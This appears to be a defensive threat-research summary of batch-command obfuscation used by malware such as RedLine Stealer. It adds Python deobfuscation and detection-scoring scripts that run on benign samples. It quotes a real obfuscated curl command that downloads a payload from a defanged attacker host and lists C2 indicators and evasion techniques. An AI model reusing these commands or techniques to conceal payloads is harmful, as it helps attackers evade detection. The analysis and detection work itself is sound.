Securonix Threat Research Knowledge Sharing Series: Batch (DOS) Obfuscation or DOSfuscation: Why It’s on the Rise, and How Attackers are Hiding in Obscurity

Securonix Threat Labs describes a growing trend of “DOSfuscation” where threat actors hide malicious payloads inside obfuscated batch/DOS commands—often delivered via .lnk shortcuts—to evade AMSI and antivirus detections. The post details common obfuscation techniques (string splitting, variable substitution, index extraction, encoding changes), deobfuscation approaches, and detection recommendations. #RedLineStealer #Villain

Keypoints

  • Batch/DOS obfuscation (DOSfuscation) is rising as attackers shift from Office macros to .lnk/.cmd delivery paths after macros were disabled by default.
  • cmd.exe is favored because AMSI does not natively inspect batch scripts, reducing the chance of AV/EDR detection at initial execution.
  • Common obfuscation techniques include string splitting (escape chars/quotes), variable substitution, variable index extraction, and encoding manipulation (e.g., UTF-16LE).
  • Real-world families using these methods include RedLine Stealer, BatCloak, Villain/Hoaxshell, OCX#HARVESTER, Trickbot, and others listed in the article.
  • Deobfuscation strategies vary by technique: simple find/replace for split strings, variable resolution or redirected echo for substitutions, manual variable/index reconstruction for index extraction, and re-encoding (UTF-16LE→UTF-8) for encoding manipulation.
  • Detection recommendations: enable command-line/process logging (Event ID 4688), deploy Sysmon, and use targeted hunting queries to spot obfuscated cmd.exe invocations and delayed-expansion patterns.

MITRE Techniques

  • [T1027] Obfuscated Files or Information – Used to hide batch commands and payload URLs inside obfuscated cmd.exe command lines (‘/c set c=cu7rl –s7sl-no-rev7oke -s -d “id=VzXdED&Prog=2_Mal_vbs.txt&WH=The-global-.pdf” -X PO7ST hxxps://east-healthy-dress.glitch[.]me/Down -o %temp%down.v7bs’)
  • [T1027.010] Command Obfuscation – Specific command-line manipulation techniques (string splitting, caret escapes, quoted fragments) to evade signatures (‘wh^oam^i’ and use of ‘^’ inside commands)
  • [T1140] Deobfuscate/Decode Files or Information – Attackers encode payloads (e.g., UTF-16LE) that must be decoded to reveal executable commands (‘encoded RedLine Stealer payload’ requiring re-encoding back to UTF-8)
  • [T1059] Command and Scripting Interpreter – Batch files and cmd.exe are used as the interpreter for execution of obfuscated commands (shortcuts linking to cmd.exe with appended obfuscated code) (‘cmd.exe linked shortcut would contain obfuscated batch code’)
  • [T1059.003] Windows Command Shell – Use of Windows command shell features (delayed expansion /v:on, variable substring extraction %var:~start,len%) to reconstruct commands at runtime (‘%variable:~start_index_num,end_index_num%’ used to extract characters)

Indicators of Compromise

  • [Domain/URL] C2 and download hosts – hxxps://east-healthy-dress.glitch[.]me/Down, hxxps://convertmast[.]com/bldd (and 1 more domain)
  • [IP address] Host delivery examples – 95.179.201[.]171 (observed in concatenated C2 string)
  • [File names] Payload/executable names – bud.exe, bud2.exe, down.v7bs (temporary/downloaded payloads)
  • [File extensions / artifacts] Delivery and script files – .lnk shortcuts used to invoke cmd.exe, .bat batch files (e.g., 3.bat), .v7bs/.vbs downloader stubs
  • [Command patterns] Obfuscated command-line patterns – use of ‘/v:on’, ‘for /L %’, ‘!!’, and split/set patterns (useful for hunting queries)

Attackers increasingly place obfuscated batch code into .lnk shortcuts so that cmd.exe becomes the initial interpreter; this bypasses AMSI, which does not inspect traditional batch files. Common obfuscation techniques documented include simple string splitting (inserting carets ^ or mismatched quotes to break signature matches), variable substitution (defining many set variables and concatenating them with %var% or delayed expansion !var!), indexed character extraction (%var:~start,len%) to build commands from long strings, and encoding manipulation (storing the script in UTF-16LE or another encoding so it appears as gibberish until re-encoded).

Deobfuscation approaches map to each method: for split strings, remove the escape characters or quotes with a find/replace; for substitution-based obfuscation, map and replace the variable definitions, or redirect execution to echo the assembled command rather than executing it; for index extraction, recreate the original variables in a controlled shell and use echo to print the resolved substrings; and for encoding tricks, simply re-encode the file back to UTF-8 (e.g., with CyberChef or a simple Python/batch script) to restore readability. Practical examples in the analysis include an OCX#HARVESTER string that resolves to http://95.179.201[.]171/robots.php and a RedLine payload that reconstructs curl download-and-start commands for bud.exe/bud2.exe.
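As an added example (not Securonix's tooling and not code from the article), the following Python script automates the four deobfuscation steps above for a single logged command line: it strips the `cmd.exe /v:on /c "..."` wrapper, removes caret escapes and empty quote pairs, collects `set` definitions, resolves `%var%` / `!var!` references including `:~start,len` substring extraction with cmd's own index rules, and decodes a UTF-16LE script back to text. The samples at the bottom are constructed, benign command lines that all resolve to `whoami`; the helper and variable names are this example's own.

```python
"""Deobfuscation helpers for the four batch tricks summarised above: caret and
quote splitting, set-variable substitution, %var:~start,len% index extraction
and UTF-16LE encoding. Added example, not Securonix's tooling; the samples at
the bottom are constructed, benign command lines."""
import re

# Leading 'cmd.exe /v:on /c "..."' wrapper, optionally with a full path.
WRAPPER_RE = re.compile(
    r'^\s*"?(?:[^"\s]*[\\/])?cmd(?:\.exe)?"?\s+(?:/[a-z](?::\w+)?\s+)*', re.I)
# 'set a=b' or 'set "a=b"'; the quoted form protects '&' inside the value.
SET_RE = re.compile(r'^set\s+"?([^="\s]+)=(.*?)"?\s*$', re.I)
# %name%, !name!, %name:~s%, %name:~s,l%; '!' is the delayed-expansion form.
REF_RE = re.compile(r'([%!])([^%!:\s]+)(?::~(-?\d+)(?:,(-?\d+))?)?\1')

def strip_cmd_wrapper(cmdline: str) -> str:
    m = WRAPPER_RE.match(cmdline)
    payload = (cmdline[m.end():] if m else cmdline).strip()
    if len(payload) >= 2 and payload[0] == '"' and payload[-1] == '"':
        payload = payload[1:-1]
    return payload

def strip_split_chars(cmd: str) -> str:
    """Technique 1: '^' escapes the next character (so '^^' is one literal
    caret) and an empty quote pair is a no-op; both only defeat signatures."""
    return re.sub(r'\^(.)', r'\1', cmd).replace('""', '')

def split_statements(cmd: str) -> list:
    """Split on '&' outside double quotes."""
    parts, cur, in_quotes = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == '&' and not in_quotes:
            parts.append(''.join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur))
    return [p.strip() for p in parts if p.strip()]

def cmd_substring(value: str, start: int, length=None) -> str:
    """Technique 3: cmd's %var:~start,len% rules. A negative start counts from
    the end, a negative len drops that many trailing characters, no len means
    'to the end'."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    return value[start:n + length] if length < 0 else value[start:start + length]

def resolve_refs(text: str, env: dict) -> str:
    """Technique 2: replace %var%/!var! references (with optional :~s,l)."""
    def repl(m):
        name = m.group(2).lower()
        if name not in env:
            return m.group(0)           # unknown variable: leave as written
        value = env[name]
        if m.group(3) is not None:
            length = int(m.group(4)) if m.group(4) is not None else None
            value = cmd_substring(value, int(m.group(3)), length)
        return value
    return REF_RE.sub(repl, text)

def deobfuscate(cmdline: str, rounds: int = 10) -> str:
    """Return the command the obfuscated line would actually run."""
    statements = split_statements(strip_split_chars(strip_cmd_wrapper(cmdline)))
    env = {m.group(1).lower(): m.group(2) for m in map(SET_RE.match, statements) if m}
    for _ in range(rounds):      # resolve nested definitions until stable,
        updated = {k: resolve_refs(v, env) for k, v in env.items()}
        if updated == env:       # which is what delayed expansion yields
            break
        env = updated
    final = [re.sub(r'^call\s+', '', resolve_refs(st, env), flags=re.I)
             for st in statements if not SET_RE.match(st)]
    return ' & '.join(final)

def decode_script_bytes(data: bytes) -> str:
    """Technique 4: a script saved as UTF-16LE reads as NUL-interleaved
    gibberish in an ASCII viewer; detect it by BOM or NUL pattern."""
    if data.startswith(b'\xff\xfe'):
        return data[2:].decode('utf-16-le')
    odd = data[1::2]
    if odd and odd.count(0) > len(odd) // 2:
        return data.decode('utf-16-le', errors='replace')
    return data.decode('utf-8', errors='replace')

# Constructed samples in the style of the techniques above (all run 'whoami').
SAMPLES = {
    "split": 'cmd /c wh^oam^i /a""ll',
    "subst": 'cmd /v:on /c "set a=who&set b=ami&set c=!a!!b!&call !c!"',
    "index": 'cmd /v:on /c "set x=zzwhoamizz /allzz&call !x:~2,6! !x:~11,4!"',
}
SAMPLE_UTF16 = '\ufeffwhoami /all\r\n'.encode('utf-16-le')

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(label, "->", deobfuscate(sample))
```

Running the script prints the resolved command for each sample; `decode_script_bytes(open(path, "rb").read())` is the equivalent of the re-encoding step for a file on disk. Two design points matter for analysis work: unknown variable references are left in place rather than replaced with an empty string, so a partially resolved line still shows where the missing definitions are, and `%var%` and `!var!` are resolved the same way, which is what the obfuscator intends under `/v:on` even though plain `%var%` inside a single line would normally expand before the `set` runs.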

For detection, capture full process creation with command-line (Event ID 4688) and deploy Sysmon to log process activity; hunt for cmd.exe process starts containing patterns like ‘/v:on’, ‘for /L %’, ‘!!’, ‘set ’ with suspicious spacing or caret characters, and monitor .lnk file executions originating from user folders or extracted archives. The article includes example Securonix hunting queries and provisional detections that search for caret-split tokens, delayed expansion flags, and repeated set/echo constructs as high-value indicators of DOSfuscation activity.
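The hunting logic above, as an added Python example that can be tested offline (it is not one of Securonix's queries and not code from the article): each command-line pattern the post names becomes a weighted indicator, a cmd.exe process-creation record scores the sum of the indicators it matches, and records at or above a threshold are returned together with the indicator names so an analyst can see why they fired. The weights, the threshold, the record field names and every event in `SAMPLE_EVENTS` are assumptions constructed for this demonstration, not real telemetry.

```python
"""Scoring cmd.exe command lines from process-creation telemetry (Event ID
4688 'Process Command Line', or Sysmon Event ID 1) for the DOSfuscation
patterns listed above. Added example, not one of Securonix's hunting queries;
indicator weights and threshold are assumptions for this demo, and every
event below is constructed, not real telemetry."""
import re

# (name, pattern, weight): the command-line artefacts each technique leaves.
INDICATORS = [
    ("delayed_expansion_flag", re.compile(r'/v:on', re.I), 3),        # cmd /v:on
    ("delayed_expansion_ref", re.compile(r'![^!\s]+!'), 2),           # !var!
    ("for_L_loop", re.compile(r'\bfor\s+/L\s+%', re.I), 2),            # for /L %i
    ("caret_in_token", re.compile(r'\w\^\w'), 3),                     # wh^oami
    ("substring_extraction", re.compile(r'[%!][^%!\s]+:~-?\d+'), 3),  # %v:~2,6%
    ("empty_quote_pairs", re.compile(r'""'), 1),                      # /a""ll
]
SET_STMT_RE = re.compile(r'\bset\s+"?[^="\s]+=', re.I)

def score_command_line(cmdline: str):
    """Return (score, [indicator names]) for one command line."""
    score, hits = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(cmdline):
            score += weight
            hits.append(name)
    n_set = len(SET_STMT_RE.findall(cmdline))
    if n_set >= 3:               # many tiny variables defined in one line
        score += 2
        hits.append(f"many_set_statements({n_set})")
    return score, hits

def hunt(events, threshold: int = 3):
    """Flag cmd.exe process creations whose command line scores >= threshold.
    Returns [(RecordId, score, hits)] so an analyst can see why it fired."""
    flagged = []
    for ev in events:
        if not ev.get("NewProcessName", "").lower().endswith("\\cmd.exe"):
            continue             # other interpreters need their own rules
        score, hits = score_command_line(ev.get("CommandLine", ""))
        if score >= threshold:
            flagged.append((ev["RecordId"], score, hits))
    return flagged

CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed 4688-style records: two benign, three obfuscated, one benign
# 'for /L' loop that stays under threshold, one non-cmd.exe process.
SAMPLE_EVENTS = [
    {"RecordId": 1, "NewProcessName": CMD,
     "CommandLine": r'cmd.exe /c dir C:\Users\alice\Documents'},
    {"RecordId": 2, "NewProcessName": CMD,
     "CommandLine": 'cmd.exe /c "ipconfig /all"'},
    {"RecordId": 3, "NewProcessName": CMD,
     "CommandLine": 'cmd.exe /v:on /c "set a=who&set b=ami&set c=!a!!b!&call !c!"'},
    {"RecordId": 4, "NewProcessName": CMD,
     "CommandLine": 'cmd.exe /c wh^oam^i'},
    {"RecordId": 5, "NewProcessName": CMD,
     "CommandLine": 'cmd.exe /v:on /c "set x=zzwhoamizz&call !x:~2,6!"'},
    {"RecordId": 6, "NewProcessName": CMD,
     "CommandLine": 'cmd.exe /c for /L %i in (1,1,3) do echo %i'},
    {"RecordId": 7, "NewProcessName": PS,
     "CommandLine": 'powershell.exe -c "echo !a!"'},
]

if __name__ == "__main__":
    for record_id, score, hits in hunt(SAMPLE_EVENTS):
        print(record_id, score, ", ".join(hits))
```

With the default threshold the three obfuscated records fire and the plain `for /L` loop does not; lowering the threshold to 2 pulls the loop in, which is the trade-off the post's "high-value indicators" wording points at: a single weak pattern is noisy on its own, while `/v:on` combined with `!var!` references or `:~` substring extraction almost never appears in administrative use. The same scoring can be applied to Sysmon Event ID 1 by reading `Image` and `CommandLine` instead of the 4688 field names used here.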

Read more: https://www.securonix.com/blog/securonix-threat-research-knowledge-sharing-series-batch-obfuscation/